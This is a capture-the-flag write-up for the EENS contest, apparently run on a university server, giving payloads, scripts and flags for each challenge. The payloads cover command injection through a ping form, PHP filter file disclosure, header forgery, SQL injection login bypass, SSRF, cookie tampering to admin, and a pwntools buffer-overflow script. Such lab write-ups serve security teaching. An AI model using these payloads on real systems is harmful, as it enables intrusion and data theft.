Try   HackMD

CTF write up : EENS

Ping

  • url: http://eens.ee.ncku.edu.tw:5104/
  • payload:
127.0.0.1 | cat flag/flag.txt
  • detail: 127.0.0.1 | cat app.py
from flask import Flask, render_template, request, url_for import subprocess app = Flask(__name__) @app.route('/') def home(): return render_template('home.html') @app.route('/', methods=['POST']) def webshell(): command = request.form['command'] if ("vi" or ">") in command: output = "your command is error!!!What are you trying to do!!!" else: try: output = subprocess.check_output("ping -c1 " + command, stderr=subprocess.STDOUT, shell=True) print output except Exception as e: output = "your command is error!!!What are you trying to do!!!" return render_template('home.html', allCarbDiet=output) if __name__ == '__main__': app.run(host='0.0.0.0', port=80)
  • details:
    • 進入頁面首先看到一個可以輸入要 ping 的網址的input
    • 直接猜測後端使用 subprocess 之類的
    • 先試試 127.0.0.1 | ls 確定可以用 pipeline | 繞過
    • 用上面的 exploit 得到 flag
  • flag:EENS{4fbaf3a4a7abdb459fc4f95fcbafb2dae920132583862c08eb4403037606e708}
tags: bypass

EZPHP

  • url: eens.ee.ncku.edu.tw:5006
  • payload: php://filter/read=convert.base64-encode/resource=index.php
    • result
PCFET0NUWVBFIGh0bWw+ICAgICAKPGhlYWQ+CjxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtVHlwZSIgY29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PXV0Zi04Ij4KPC9oZWFkPgogICAgPGJvZHk+CiAgICAgICAgPHA+R2V0IG1lIGEgZmlsZSBuYW1lLCBJJ2xsIHJlYWQgdGhlIGZpbGUgZm9yIHlvdSAhPC9wPgoJCTxwIHN0eWxlPSJjb2xvcjpncmF5OyI+ICogVHJ5IDEudHh0IDwvcD4KPGZvcm0gYWN0aW9uPSJpbmRleC5waHAiIG1ldGhvZD0icG9zdCI+CllvdXIgaW5wdXQ6IDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJpbnB1dCIgLz4K44CAPGlucHV0IHR5cGU9InN1Ym1pdCIgbmFtZT0i6YCB5Ye66KGo5ZauIi8+CjwvZm9ybT4KCjw/cGhwCi8vIFRoZSBmbGFnIGZvciBFWnBocCBpcyBFRU5TezNjY2JkN2I1NWU2N2EwOWJjMDg1ZTMyZjZhNzllMmNmZGZlMDNlODUyNWFlMmUyN2M5MmE2NDZjNjc5YmYwMGN9CgokaXAgPSAkX1NFUlZFUlsiUkVNT1RFX0FERFIiXTsKaWYgKCRpcCA9PSAnMTI3LjAuMC4xJyl7CiAgICAvLyA1NVJmXzEKICAgICRjb250ZW50ID0gZmlsZV9nZXRfY29udGVudHMoImZsYWdWR2hwYzBselFVWnNZV2REWVc1dWIzUkNaVVp2ZFc1ayIpOwogICAgZWNobyAkY29udGVudDsKfQplbHNlaWYoJF9TRVJWRVJbIkhUVFBfQ0xJRU5UX0lQIl09PScxMjcuMC4wLjEnICYmICRfU0VSVkVSWyJIVFRQX1hfRk9SV0FSREVEX0ZPUiJdID09JzEyNy4wLjAuMScpewogICAgLy8gNTVSZl8yCiAgICAkY29udGVudCA9IGZpbGVfZ2V0X2NvbnRlbnRzKCJmbGFnU1dSdmJuUjNZVzUwZVc5MWEyNXZkdz09Iik7CiAgICBlY2hvICRjb250ZW50Owp9CmVsc2V7CiAgICAkaW5wdXQgIC49ICAkX1BPU1QgWyAnaW5wdXQnIF07CiAgICAkZmlsZW5hbWUgPSB0cmltKCRpbnB1dCk7CiAgICBpZiAoc3RycG9zKCRpbnB1dCwgJ2ZsYWcnKSAhPT0gZmFsc2UpewogICAgICAgIGVjaG8gIjxicj4iOwogICAgICAgIGVjaG8gIllvdSBhcmUgYSBiYWQgaGFja2VyICEhISI7CiAgICB9CiAgICBlbHNlewogICAgICAgICRjb250ZW50ID0gZmlsZV9nZXRfY29udGVudHMoJGZpbGVuYW1lKTsKICAgICAgICBpZiAocHJlZ19tYXRjaCgiL2ZsYWcvaSIsICRjb250ZW50KSl7CgkJCWVjaG8gIjxicj4iOwogICAgICAgICAgICBlY2hvICJZb3UgYXJlIGEgYmFkIGhhY2tlciAhISEiOwogICAgICAgIH0KICAgICAgICBlbHNlewogICAgICAgICAgICBlY2hvICI8YnI+IjsKICAgICAgICAgICAgZWNobyAkY29udGVudDsKICAgICAgICB9CiAgICAgICAgCiAgICB9Cn0KPz4KICAgIDwvYm9keT4KCjwvaHRtbD4K
  • base64 decode
<!DOCTYPE html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> </head> <body> <p>Get me a file name, I'll read the file for you !</p> <p style="color:gray;"> * Try 1.txt </p> <form action="index.php" method="post"> Your input: <input type="text" name="input" />  <input type="submit" name="送出表單"/> </form> <?php // The flag for EZphp is EENS{3ccbd7b55e67a09bc085e32f6a79e2cfdfe03e8525ae2e27c92a646c679bf00c} $ip = $_SERVER["REMOTE_ADDR"]; if ($ip == '127.0.0.1'){ // 55Rf_1 $content = file_get_contents("flagVGhpc0lzQUZsYWdDYW5ub3RCZUZvdW5k"); echo $content; } elseif($_SERVER["HTTP_CLIENT_IP"]=='127.0.0.1' && $_SERVER["HTTP_X_FORWARDED_FOR"] =='127.0.0.1'){ // 55Rf_2 $content = file_get_contents("flagSWRvbnR3YW50eW91a25vdw=="); echo $content; } else{ $input .= $_POST [ 'input' ]; $filename = trim($input); if (strpos($input, 'flag') !== false){ echo "<br>"; echo "You are a bad hacker !!!"; } else{ $content = file_get_contents($filename); if (preg_match("/flag/i", $content)){ echo "<br>"; echo "You are a bad hacker !!!"; } else{ echo "<br>"; echo $content; } } } ?> </body> </html>
  • flag: EENS{3ccbd7b55e67a09bc085e32f6a79e2cfdfe03e8525ae2e27c92a646c679bf00c}
tags: pseudo protocol php

EZphp_2

  • Header forge
X-Forwarded-For: 127.0.0.1
Client-IP: 127.0.0.1
  • flag: EENS{868ff5b3432facbfab5a5657aaaf7f96301b673acb532236398e1d05b26380c6}
tags: Header X-Forwarded-For Burp suite

Try to Login

  • url: http://eens.ee.ncku.edu.tw:5101
  • payload:
1' or '1'='1
  • flag: EENS{cf2d891cb01a75a806ca50d6d5cb3f7af532534bb649ab1fa1f11464982419f8}
tags: sql injection bypass

EZphp_3

  • payload: http://127.0.0.1
  • flag: EENS{ae852e946757b0a32f386aeba991abae99c25d3ed4514fd1dfe0ebe43ab653c6}
tags: ssrf
  • url: http://eens.ee.ncku.edu.tw:5102
  • solution:
    • use burp suit
    • changne cookie from user to admin
GET /fonts/font-awesome-4.7.0/fonts/fontawesome-webfont.woff2?v=4.7.0 HTTP/1.1
Host: eens.ee.ncku.edu.tw:5102
Accept: */*
Connection: close
Cookie: level: admin; session=0ba64634-7efd-4ee3-8052-7de342d7db3d.taDtAHyw_ixod5mf6Q7NVuWRaZg; _ga=GA1.3.666780538.1583373154; _gid=GA1.3.729447486.1584775510; s_pers=%20c19%3Dpr%253Apure%2520portal%253Apersons%253Aview%7C1584262262181%3B%20v68%3D1584260460625%7C1584262262186%3B%20v8%3D1584260581398%7C1678868581398%3B%20v8_s%3DMore%2520than%252030%2520days%7C1584262381398%3B; AMCV_4D6368F454EC41940A4C98A6%40AdobeOrg=-432600572%7CMCIDTS%7C18337%7CMCMID%7C34021734364032204804614156171821970172%7CMCAID%7CNONE%7CMCOPTOUT-1584267662s%7CNONE%7CMCAAMLH-1584865262%7C11%7CMCAAMB-1584865262%7Cj8Odv6LonN4r3an7LhD3WZrU1bUpAkFkkiY1ncBR96t2PTI%7CMCSYNCSOP%7C411-18344%7CvVersion%7C4.5.2; s_fid=0B3F668660A8EC43-1554906741E9BCDC
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.4 Safari/605.1.15
Accept-Language: zh-tw
Referer: http://eens.ee.ncku.edu.tw:5102/
Accept-Encoding: gzip, deflate
  • flag: EENS{35ee65df86b64dbb411fa3b6b803117844819e12f8372ebec139107738527506}

Hello_CTF

  • copy paste
  • flag: EENS{HeL10_C7f}

Guess a password

  • strings rn.png
  • flag: EENS{Senbonzakura_Kageyoshi}
tags: strings

sha1

Input first secret: Input second secret: Traceback (most recent call last): File "sha1.py", line 16, in <module> secret_2 = str(raw_input()) EOFError: EOF when reading a line [21] Failed to execute script sha1
from pwn import * import hashlib import base64 f1 = open('shattered-1.pdf', 'rb').read() f2 = open('shattered-2.pdf', 'rb').read() encoder = hashlib.sha1() encoder.update(f1) print(encoder.digest()) encoder.update(f2) print(encoder.digest()) conn = remote('140.116.215.203', 5001) conn.recvline('Input first secret:') conn.sendline(base64.b64encode(f1)) conn.recvline('Input second secret:') conn.sendline(base64.b64encode(f2)) conn.interactive()
  • flag: EENS{974c7afceb5175b6b17ae7017827b6a6e8027c172dcb80cf53e52829f9cd222a}

Translate Me

  • exploit
chiper = 'MHBFOBNMAOPSQWDVSFCUACSTBDRMOMSKGRZQHALJRNJSRRGLSREUFSLC' key = 'IDONTTHINKYOOOOOOOUCANSLOVETHISSOJUSTGIVEUPANDTAKEABREAK' dic = {} base = 64 f = open('cipher.txt') def decode(dic, c, k): i = dic[k].index(c) i += base return chr(i) [print(f.readline()) for i in range(3)] for i in range(26): tmp = f.readline() tmp = tmp.split('|') dic[tmp[0]] = tmp[1].replace('\n', '').split(' ') f.close() flag = '' for c, k in zip(chiper, key): if c == '{' or c == ' ' or c == '}': flag += c else: flag += decode(dic, c, k) print(flag)
  • flag: EENS{VIGENERE CIPHER IS A PAIN IN THE ASS IF YOU DONT USE ONLINE TOOLS}

You can't type

Could you login?

  • pwn_1.c
#include <stdio.h> #include <stdlib.h> #include <string.h> char acc[10]; char pass[10]; char allow[4]; int main() { strcpy(allow,"no"); FILE *fd = fopen("secret.txt", "r"); char username[10], password[10], flag[256]; fscanf(fd, "%s", username); fscanf(fd, "%s", password); fscanf(fd, "%s", flag); printf("Username: \n"); fflush(stdout); scanf("%s",acc); fflush(stdout); printf("Password: \n"); fflush(stdout); scanf("%s",pass); fflush(stdout); if ((!strcmp(acc, username)) && !(strcmp(pass, password)) ) strcpy(allow, "yes"); if (!strcmp(allow, "yes")) printf("Nice!\n%s\n", flag); else printf("You are bad guy so you cannot access!\n"); fflush(stdout); return 0; }
from pwn import * conn = remote('140.116.215.203', 5201) conn.recvline('Username:') conn.sendline('a') conn.recvline('Password:') conn.sendline('b' * 10 + 'yes') conn.interactive()
  • a classic buffer overflow
  • flag: EENS{7his_Is_a_Simp1e_Buffer_0VERF1ow_practice.}
tags: overflow

God of Mental Arithmetic

from pwn import * def solve(q): q = q.replace('?', '').replace(' ', ''). replace('=', '') if '+' in q: Q = q.split('+') return str(int(Q[0])+int(Q[1])) else: Q = q.split('-') return str(int(Q[0])-int(Q[1])) conn = remote('140.116.215.203', 5005) for i in range(100): conn.recv() q = conn.recv().decode('utf-8').split('\n')[-2] conn.sendline(solve(q)) conn.interactive()
  • flag: EENS{a52e4d6f04166133d4e3e70aeec1e393d6c8dafdd0de138c51cf7be64483ffb6}

Eat more and more

  • given a.out
    • description: get 500 to win
  • reverse with ghidra: find a scores symbol
  • gdb
$> b main $> info address scores > get the address of symbol scores $> set {int}address = 500 $> c
  • flag: EENS{Be_Patient_AND_ENJOY_THIS_GAME!!!!}
tags: ghidra gdb reverse

Kids doodle

with open('flag.png', 'rb') as f: data = bytearray(f.read()) data[2] = 0x4E f.close() with open('exploit.png', 'wb') as f: f.write(data) f.close()
  • get a QRCODE: RUVOU3tsYXM7ZG4sbXp3a2VqdGtzenguY252enhjdn0=

  • flag: EENS{las;dn,mzwkejtkszx.cnvzxcv}

tags: forensics magic number

Go upstairs without elevator

  • exploit
import os from glob import glob lists = ['./850+236.zip'] def cal(path): p = path.replace('./', '') q = p.split('.')[0] a, b = q.split('+')[0], q.split('+')[1] return str(int(a)+int(b)) def unzip(path): ans = cal(path) os.system(f'unzip -P {ans} {path}') files = glob('./*.zip') for f in files: if f not in lists: return f target = './850+236.zip' while True: new = unzip(target) lists.append(new) target = new
  • flags: EENS{Th3r3_ls_th3_FIag_TEN50fTHOUSAND50f_STAGE5_AND_1I11l1ll1l1l1ll1lIIll1III1}

Chained Connie

  • exploit
import requests flag = [] for i in range(0, 30): r = requests.get(f'http://eens.ee.ncku.edu.tw:5103/search?p={i}') flag.append(r.headers['flag']) print(''.join(flag))
  • flag: EENS{Not_only_block_can_chain}

zip the zip

  • exploit

    • use https://github.com/Ethonwu/Zip-file-crack-using-dictionary
    • with rockyou.txt
    • password: zxcvbnm
  • flag: EENS{Whether_'tis_nobler_in_the_mind_to_suffer}